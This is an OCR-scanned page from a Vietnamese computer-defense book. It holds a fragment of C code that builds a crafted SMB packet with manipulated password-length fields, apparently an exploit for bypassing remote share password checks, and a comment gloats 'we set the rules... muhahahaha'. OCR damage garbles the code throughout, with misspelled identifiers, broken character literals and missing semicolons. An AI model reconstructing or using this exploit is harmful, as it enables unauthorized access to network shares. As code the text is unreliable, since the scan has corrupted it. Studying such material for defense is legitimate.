Page 120 - Hướng Dẫn Cách Phòng Thủ Và Khắc Phục Sự Cố Máy Tính
P. 120

if (send (sock, Ipdata, strlen (password) + strlen (login)
  + 61,
      0) = = -1) return -1;
      if (recv (sock, Ipdata,  1024, 0) == -1) return -1;

      return (Ipdata [9]);
      }
      void build_crafted_smb_packet (char*remoteshare, char
      *remotepassword)
       {
      memset (smb_packet, 0, sizeof (smb_packet));
      smb_packet [4] ='\xff;

      smb_packet [5] = 'S'
      smb_packet [6] = 'M';
      smb_packet [7] = 'B';
      smb_packet [8] = 'u';
      smb_packet [13] = '\xl8';

      smb_packet [14] = '\x01';
      smb_packet [15] = '
      smb_packet [31] = '\x28';
      smb_packet [32] = uid%256;
      sinb_packet [33] = uid/256;
      smb_packet [36] = '\x04';
      smb_packet [37] = '\x ff;
      smb_packet [43] =  strlen (remotepassword);

      //  number of bytes  we  wanna  remote  side  to conĩirm.
  we set the rules... muhahahaha
      smb_packet  [45]=strlen  (remotepassword)  +  strlen
  (remoteshare) +1;
      memcpy (&smb_packet[47], remotepassvvord,


                                                                121
   115   116   117   118   119   120   121   122   123   124   125